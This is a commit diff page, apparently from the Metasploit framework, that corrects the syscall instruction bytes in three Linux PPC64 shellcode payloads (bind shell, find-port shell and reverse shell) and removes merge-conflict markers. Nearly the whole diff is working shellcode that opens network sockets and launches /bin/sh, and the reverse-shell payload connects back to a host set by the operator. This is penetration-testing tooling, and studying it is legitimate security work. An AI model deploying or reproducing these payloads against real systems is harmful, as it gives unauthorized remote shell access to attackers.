Skip to content

Commit be394b7

Browse files
msutovsky-r7msutovsky-r7
committed
Adding PPC64 template, fixing PPC64 single payloads
1 parent 00852f4 commit be394b7

File tree

3 files changed

+15
-106
lines changed

3 files changed

+15
-106
lines changed

modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb

Lines changed: 7 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -28,6 +28,7 @@ def initialize(info = {})
2828
'LPORT' => [ 58, 'n' ]
2929
},
3030
'Payload' =>
31+
3132
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
3233
"\x3b\xa0\x01\xff" + # li r29,511 #
3334
"\x3b\x9d\xfe\x02" + # addi r28,r29,-510 #
@@ -38,7 +39,7 @@ def initialize(info = {})
3839
"\x7c\x24\x0b\x78" + # mr r4,r1 #
3940
"\x38\x7d\xfe\x02" + # addi r3,r29,-510 #
4041
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
41-
"\x44\xff\xff\x02" + # sc #
42+
"\x44\x00\x00\x02" + # sc #
4243
"\x7c\x7a\x1b\x78" + # mr r26,r3 #
4344
"\x3b\x3d\xfe\x11" + # addi r25,r29,-495 #
4445
"\x3e\xe0\xff\x02" + # lis r23,-254 #
@@ -52,23 +53,23 @@ def initialize(info = {})
5253
"\x7c\x24\x0b\x78" + # mr r4,r1 #
5354
"\x38\x7d\xfe\x03" + # addi r3,r29,-509 #
5455
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
55-
"\x44\xff\xff\x02" + # sc #
56+
"\x44\x00\x00\x02" + # sc #
5657
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
5758
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
5859
"\xfb\x41\xff\xf9" + # stdu r26,-8(r1) #
5960
"\x7c\x24\x0b\x78" + # mr r4,r1 #
6061
"\x38\x7d\xfe\x05" + # addi r3,r29,-507 #
6162
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
62-
"\x44\xff\xff\x02" + # sc #
63+
"\x44\x00\x00\x02" + # sc #
6364
"\x7c\x24\x0b\x78" + # mr r4,r1 #
6465
"\x38\x7d\xfe\x06" + # addi r3,r29,-506 #
6566
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
66-
"\x44\xff\xff\x02" + # sc #
67+
"\x44\x00\x00\x02" + # sc #
6768
"\x7c\x75\x1b\x78" + # mr r21,r3 #
6869
"\x7f\x64\xdb\x78" + # mr r4,r27 #
6970
"\x7e\xa3\xab\x78" + # mr r3,r21 #
7071
"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
71-
"\x44\xff\xff\x02" + # sc #
72+
"\x44\x00\x00\x02" + # sc #
7273
"\x37\x7b\xff\xff" + # addic. r27,r27,-1 #
7374
"\x40\x80\xff\xec" + # bge+ <bndsockcode64+148> #
7475
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
@@ -81,7 +82,7 @@ def initialize(info = {})
8182
"\xf8\x61\xff\xf9" + # stdu r3,-8(r1) #
8283
"\x7c\x24\x0b\x78" + # mr r4,r1 #
8384
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
84-
"\x44\xff\xff\x02" + # sc #
85+
"\x44\x00\x00\x02" + # sc #
8586
"/bin/sh"
8687
}
8788
)

modules/payloads/singles/linux/ppc64/shell_find_port.rb

Lines changed: 4 additions & 48 deletions
Original file line numberDiff line numberDiff line change
@@ -28,7 +28,7 @@ def initialize(info = {})
2828
'CPORT' => [ 86, 'n' ]
2929
},
3030
'Payload' =>
31-
<<<<<<< HEAD
31+
3232
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
3333
"\x3b\xa0\x01\xff" + # li r29,511 #
3434
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
@@ -47,7 +47,7 @@ def initialize(info = {})
4747
"\x7c\x24\x0b\x78" + # mr r4,r1 #
4848
"\x38\x7d\xfe\x08" + # addi r3,r29,-504 #
4949
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
50-
"\x44\xff\xff\x02" + # sc #
50+
"\x44\x00\x00\x02" + # sc #
5151
"\x3b\x3c\x01\xff" + # addi r25,r28,511 #
5252
"\xa3\x39\xfe\x03" + # lhz r25,-509(r25) #
5353
"\x28\x19\x04\xd2" + # cmplwi r25,1234 #
@@ -56,7 +56,7 @@ def initialize(info = {})
5656
"\x7f\x04\xc3\x78" + # mr r4,r24 #
5757
"\x7f\xe3\xfb\x78" + # mr r3,r31 #
5858
"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
59-
"\x44\xff\xff\x02" + # sc #
59+
"\x44\x00\x00\x02" + # sc #
6060
"\x37\x18\xff\xff" + # addic. r24,r24,-1 #
6161
"\x40\x80\xff\xec" + # bge+ <fndsockcode64+96> #
6262
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
@@ -69,52 +69,8 @@ def initialize(info = {})
6969
"\xf8\x61\xff\xf9" + # stdu r3,-8(r1) #
7070
"\x7c\x24\x0b\x78" + # mr r4,r1 #
7171
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
72-
"\x44\xff\xff\x02" + # sc #
72+
"\x44\x00\x00\x02" + # sc #
7373
'/bin/sh'
74-
=======
75-
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
76-
"\x3b\xa0\x01\xff" + # li r29,511 #
77-
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
78-
"\x7c\x3c\x0b\x78" + # mr r28,r1 #
79-
"\x3b\x7d\xfe\x11" + # addi r27,r29,-495 #
80-
"\x97\x61\xff\xfc" + # stwu r27,-4(r1) #
81-
"\x7c\x3a\x0b\x78" + # mr r26,r1 #
82-
"\xfb\x41\xff\xf9" + # stdu r26,-8(r1) #
83-
"\xfb\x81\xff\xf9" + # stdu r28,-8(r1) #
84-
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
85-
"\x3b\xff\x01\xff" + # addi r31,r31,511 #
86-
"\x3b\xff\xfe\x02" + # addi r31,r31,-510 #
87-
"\x38\x21\x01\xff" + # addi r1,r1,511 #
88-
"\x38\x21\xfe\x09" + # addi r1,r1,-503 #
89-
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
90-
"\x7c\x24\x0b\x78" + # mr r4,r1 #
91-
"\x38\x7d\xfe\x08" + # addi r3,r29,-504 #
92-
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
93-
"\x44\x00\x00\x02" + # sc #
94-
"\x3b\x3c\x01\xff" + # addi r25,r28,511 #
95-
"\xa3\x39\xfe\x03" + # lhz r25,-509(r25) #
96-
"\x28\x19\x04\xd2" + # cmplwi r25,1234 #
97-
"\x40\x82\xff\xd0" + # bne+ <fndsockcode64+40> #
98-
"\x3b\x1d\xfe\x03" + # addi r24,r29,-509 #
99-
"\x7f\x04\xc3\x78" + # mr r4,r24 #
100-
"\x7f\xe3\xfb\x78" + # mr r3,r31 #
101-
"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
102-
"\x44\x00\x00\x02" + # sc #
103-
"\x37\x18\xff\xff" + # addic. r24,r24,-1 #
104-
"\x40\x80\xff\xec" + # bge+ <fndsockcode64+96> #
105-
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
106-
"\x40\x82\xff\xfd" + # bnel+ <fndsockcode64+120> #
107-
"\x7f\xc8\x02\xa6" + # mflr r30 #
108-
"\x3b\xde\x01\xff" + # addi r30,r30,511 #
109-
"\x38\x7e\xfe\x25" + # addi r3,r30,-475 #
110-
"\x98\xbe\xfe\x2c" + # stb r5,-468(r30) #
111-
"\xf8\xa1\xff\xf9" + # stdu r5,-8(r1) #
112-
"\xf8\x61\xff\xf9" + # stdu r3,-8(r1) #
113-
"\x7c\x24\x0b\x78" + # mr r4,r1 #
114-
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
115-
"\x44\x00\x00\x02" + # sc #
116-
"/bin/sh"
117-
>>>>>>> d127729c5cf (Adding PPC64 template, fixing PPC64 single payloads)
11874
}
11975
)
12076
)

modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb

Lines changed: 4 additions & 52 deletions
Original file line numberDiff line numberDiff line change
@@ -29,7 +29,6 @@ def initialize(info = {})
2929
'LPORT' => [ 62, 'n' ]
3030
},
3131
'Payload' =>
32-
<<<<<<< HEAD
3332
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
3433
"\x3b\xa0\x01\xff" + # li r29,511 #
3534
"\x3b\x9d\xfe\x02" + # addi r28,r29,-510 #
@@ -40,7 +39,7 @@ def initialize(info = {})
4039
"\x7c\x24\x0b\x78" + # mr r4,r1 #
4140
"\x38\x7d\xfe\x02" + # addi r3,r29,-510 #
4241
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
43-
"\x44\xff\xff\x02" + # sc #
42+
"\x44\x00\x00\x02" + # sc #
4443
"\x7c\x7a\x1b\x78" + # mr r26,r3 #
4544
"\x3b\x3d\xfe\x11" + # addi r25,r29,-495 #
4645
"\x3e\xe0\x7f\x00" + # lis r23,32512 #
@@ -56,11 +55,11 @@ def initialize(info = {})
5655
"\x7c\x24\x0b\x78" + # mr r4,r1 #
5756
"\x38\x7d\xfe\x04" + # addi r3,r29,-508 #
5857
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
59-
"\x44\xff\xff\x02" + # sc #
58+
"\x44\x00\x00\x02" + # sc #
6059
"\x7f\x64\xdb\x78" + # mr r4,r27 #
6160
"\x7f\x43\xd3\x78" + # mr r3,r26 #
6261
"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
63-
"\x44\xff\xff\x02" + # sc #
62+
"\x44\x00\x00\x02" + # sc #
6463
"\x37\x7b\xff\xff" + # addic. r27,r27,-1 #
6564
"\x40\x80\xff\xec" + # bge+ <cntsockcode64+108> #
6665
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
@@ -73,55 +72,8 @@ def initialize(info = {})
7372
"\xf8\x61\xff\xf9" + # stdu r3,-8(r1) #
7473
"\x7c\x24\x0b\x78" + # mr r4,r1 #
7574
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
76-
"\x44\xff\xff\x02" + # sc #
75+
"\x44\x00\x00\x02" + # sc #
7776
'/bin/sh'
78-
=======
79-
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
80-
"\x3b\xa0\x01\xff" + # li r29,511 #
81-
"\x3b\x9d\xfe\x02" + # addi r28,r29,-510 #
82-
"\x3b\x7d\xfe\x03" + # addi r27,r29,-509 #
83-
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
84-
"\xfb\x81\xff\xf9" + # stdu r28,-8(r1) #
85-
"\xfb\x61\xff\xf9" + # stdu r27,-8(r1) #
86-
"\x7c\x24\x0b\x78" + # mr r4,r1 #
87-
"\x38\x7d\xfe\x02" + # addi r3,r29,-510 #
88-
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
89-
"\x44\x00\x00\x02" + # sc #
90-
"\x7c\x7a\x1b\x78" + # mr r26,r3 #
91-
"\x3b\x3d\xfe\x11" + # addi r25,r29,-495 #
92-
"\x3e\xe0\x7f\x00" + # lis r23,32512 #
93-
"\x62\xf7\x00\x01" + # ori r23,r23,1 #
94-
"\x3a\xc0\x04\xd2" + # li r22,1234 #
95-
"\x96\xe1\xff\xfc" + # stwu r23,-4(r1) #
96-
"\x96\xc1\xff\xfc" + # stwu r22,-4(r1) #
97-
"\x93\x61\xff\xfe" + # stw r27,-2(r1) #
98-
"\x7c\x35\x0b\x78" + # mr r21,r1 #
99-
"\xfb\x21\xff\xf9" + # stdu r25,-8(r1) #
100-
"\xfa\xa1\xff\xf9" + # stdu r21,-8(r1) #
101-
"\xfb\x41\xff\xf9" + # stdu r26,-8(r1) #
102-
"\x7c\x24\x0b\x78" + # mr r4,r1 #
103-
"\x38\x7d\xfe\x04" + # addi r3,r29,-508 #
104-
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
105-
"\x44\x00\x00\x02" + # sc #
106-
"\x7f\x64\xdb\x78" + # mr r4,r27 #
107-
"\x7f\x43\xd3\x78" + # mr r3,r26 #
108-
"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
109-
"\x44\x00\x00\x02" + # sc #
110-
"\x37\x7b\xff\xff" + # addic. r27,r27,-1 #
111-
"\x40\x80\xff\xec" + # bge+ <cntsockcode64+108> #
112-
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
113-
"\x40\x82\xff\xfd" + # bnel+ <cntsockcode64+132> #
114-
"\x7f\xc8\x02\xa6" + # mflr r30 #
115-
"\x3b\xde\x01\xff" + # addi r30,r30,511 #
116-
"\x38\x7e\xfe\x25" + # addi r3,r30,-475 #
117-
"\x98\xbe\xfe\x2c" + # stb r5,-468(r30) #
118-
"\xf8\xa1\xff\xf9" + # stdu r5,-8(r1) #
119-
"\xf8\x61\xff\xf9" + # stdu r3,-8(r1) #
120-
"\x7c\x24\x0b\x78" + # mr r4,r1 #
121-
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
122-
"\x44\x00\x00\x02" + # sc #
123-
"/bin/sh"
124-
>>>>>>> d127729c5cf (Adding PPC64 template, fixing PPC64 single payloads)
12577
}
12678
)
12779
)

0 commit comments

Comments
 (0)